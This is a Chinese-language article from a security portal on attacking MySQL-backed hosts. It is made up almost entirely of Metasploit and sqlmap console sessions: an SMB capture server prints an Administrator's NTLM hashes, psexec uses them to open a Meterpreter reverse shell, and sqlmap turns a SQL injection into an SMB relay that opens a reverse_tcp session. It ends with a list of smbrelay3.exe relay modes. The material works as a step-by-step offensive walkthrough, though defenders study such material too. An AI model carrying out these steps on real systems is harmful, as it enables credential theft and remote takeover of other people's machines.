钢铁苍穹安全服务中心

钢铁苍穹安全服务中心致力于造网络安全行业信息门户网站,专注于网络安全技术防范,黑客攻防技术研究,网络安全技术资讯,网络安全在线沟通交流互动,DDOS攻击防御等方面的内容讨论。

请输入网址:
最近检测:www.352.cn

Mysql数据库攻击技术

来源:未知 时间:
 

msf > use auxiliary/server/capture/smb
 msf auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):
 
Name Current Setting Required Description
 ---- --------------- -------- -----------
 CAINPWFILE no The local filename to store the hashes in Cain&Abel format
 CHALLENGE 1122334455667788 yes The 8 byte challenge
 JOHNPWFILE no The prefix to the local filename to store the hashes in JOHN format
 SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
 SRVPORT 445 yes The local port to listen on.
 SSL false no Negotiate SSL for incoming connections
 SSLCert no Path to a custom SSL certificate (default is randomly generated)
 SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
 
msf auxiliary(smb) > exploit
 [*] Auxiliary module execution completed
 
[*] Server started.
 msf auxiliary(smb) >
 
然后读本共享试试
 


 
 
^_^ 成功获得了 NTLM ,
 NTLMv1 Response Captured from 192.1.1.130:1162
 USER:Administrator DOMAIN:DIS9TEAM-B39270 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
 LMHASH:be55aab30bf2e1268f57f90887c0d68e2f85252cc731bb25
 NTHASH:54b41c2204df7a9e1478f3cfa64bd9e250f57a764a0eef36
 
下面就能用METASPLOIT的 exploit/windows/smb/psexec 模块 或者NESSUS的 SMB Shell 获得系统权限
 msf exploit(psexec) > exploit

[*] Started reverse handler on 192.1.1.1:1111
 [*] Connecting to the server...
 [*] Authenticating to 192.1.1.130:445|WORKGROUP as user 'Administrator'...
 [*] Uploading payload...
 [*] Created HgLceCLd.exe...
 [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[svcctl] ...
 [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[svcctl] ...
 [*] Obtaining a service manager handle...
 [*] Creating a new service (wZdMvYRY - "MWrLYVvwSxdptGUwjxeJoQYxVEOvvSh")...
 [*] Closing service handle...
 [*] Opening service...
 [*] Starting the service...
 [*] Removing the service...
 [*] Closing service handle...
 [*] Deleting HgLceCLd.exe...
 [*] Sending stage (752128 bytes) to 192.1.1.130
 [*] Meterpreter session 1 opened (192.1.1.1:1111 -> 192.1.1.130:1168) at 2012-01-09 16:56:34 +0800
 
 
 
如果你嫌弃上面的麻烦。你可以选择SQLMAP。强大的注入工具SQLMAP提供一条龙服务。
 brk@Dis9Team:~/t/sqlmap$ sudo ./sqlmap.py -u "http://192.1.1.130/sql/index.php?id=1" --msf-path=/home/brk/t/msf3/ --os-smbrelay
 [sudo] password for brk:

sqlmap/0.9 - automatic SQL injection and database takeover tool
 
http://sqlmap.sourceforge.net
 
[*] starting at: 17:04:54
 
[17:04:54] [INFO] using '/home/brk/t/sqlmap/output/192.1.1.130/session' as session file
 [17:04:54] [INFO] testing connection to the target url
 [17:04:54] [INFO] testing if the url is stable, wait a few seconds
 [17:04:55] [INFO] url is stable
 ----------------省略-------------
 [17:05:06] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
 GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
 sqlmap identified the following injection points with a total of 22 HTTP(s) requests:
 ---
 ---
 
[17:05:11] [INFO] the back-end DBMS is MySQL
 web server operating system: Windows
 web application technology: Apache 2.0.63, PHP 5.2.14
 [17:05:11] [WARNING] it is unlikely that this attack will be successful because by default MySQL on Windows runs as Local System which is not a real user, it does not send the NTLM session hash when connecting to a SMB service
 which connection type do you want to use?
 [1] Reverse TCP: Connect back from the database host to this machine (default)
 [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
 [3] Bind TCP: Listen on the database host for a connection
 > 1
 which is the local address? [192.1.1.1]
 which local port number do you want to use? [50803] 5588
 which payload do you want to use?
 [1] Meterpreter (default)
 [2] Shell
 [3] VNC
 > 1
 which SMB port do you want to use?
 [1] 139/TCP
 [2] 445/TCP (default)
 > 2
 [17:06:34] [INFO] running Metasploit Framework 3 console locally, please wait..
 
[*] Processing /home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt for ERB directives.
 resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> use windows/smb/smb_relay
 resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVHOST 192.1.1.1
 SRVHOST => 192.1.1.1
 resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVPORT 445
 SRVPORT => 445
 resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set PAYLOAD windows/meterpreter/reverse_tcp
 PAYLOAD => windows/meterpreter/reverse_tcp
 resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LPORT 5588
 LPORT => 5588
 resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LHOST 192.1.1.1
 LHOST => 192.1.1.1
 resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> exploit
 [*] Exploit running as background job.
 ---------------------------------
 [*] Started reverse handler on 192.1.1.1:5588
 [*] Server started.
 [*] Deleting AaTNBUvw.exe...
 [*] Sending Access Denied to 192.1.1.130:1204 DIS9TEAM-B39270Administrator
 [*] Sending stage (752128 bytes) to 192.1.1.130
 [*] Meterpreter session 1 opened (192.1.1.1:5588 -> 192.1.1.130:1205) at 2012-01-09 17:06:51 +0800
 
Active sessions
 ===============
 
Id Type Information Connection
 -- ---- ----------- ----------
 1 meterpreter x86/win32 192.1.1.1:5588 -> 192.1.1.130:1205
 
 
 


如果你是WINDOWS系统呢?? 你可以用这个工具来进行攻击smbrelay3.exe
 
他提供5种攻击方式:
 
* HTTP to SMB: Negotiate authentication with an HTTP client and relay credentials to another smb host.
 
* SMB to SMB: Negotiate authentication with an SMB computer and relay credentials to another windows computer.
 
* IMAP to SMB: Negotiate authentication with an email IMAP client and relay credentials to another host.
 
* POP3 to SMB: Negotiate authentication with an email POP3 client and relay credentials to another host.
 
* SMTP to SMB: Negotiate authentication with an email SMTP client SMB computer and relay credentials.
 

    栏目导航




    更多>>推荐方案



    钢铁苍穹安全服务中心